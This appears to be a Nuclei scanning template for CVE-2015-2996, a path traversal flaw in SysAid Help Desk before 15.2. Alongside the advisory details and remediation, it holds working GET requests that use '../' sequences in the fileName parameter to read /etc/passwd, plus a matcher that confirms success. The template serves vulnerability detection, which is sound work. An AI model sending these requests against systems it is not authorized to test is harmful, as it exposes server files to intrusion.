id: CVE-2015-2996 info: name: SysAid Help Desk <15.2 - Local File Inclusion author: 0x_Akoko severity: high description: | SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum. impact: | Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. remediation: | Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability. reference: - https://seclists.org/fulldisclosure/2015/Jun/8 - https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk - http://seclists.org/fulldisclosure/2015/Jun/8 - https://nvd.nist.gov/vuln/detail/CVE-2015-2996 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C cvss-score: 8.5 cve-id: CVE-2015-2996 cwe-id: CWE-22 epss-score: 0.77754 epss-percentile: 0.98153 cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: sysaid product: sysaid shodan-query: http.favicon.hash:1540720428 tags: cve2015,cve,sysaid,lfi,seclists http: - method: GET path: - "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd" - "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd" stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200 # digest: 4a0a004730450220312369a2b289aed97447a2b6f30dc5d2b433cdaaadac8006d3c5cdac9eac8bcb022100c6c5b7d290b6e9c305b740862e6371ed4874567dc834c7705e73d0655613aa73:922c64590222798bb761d5b6d8e72950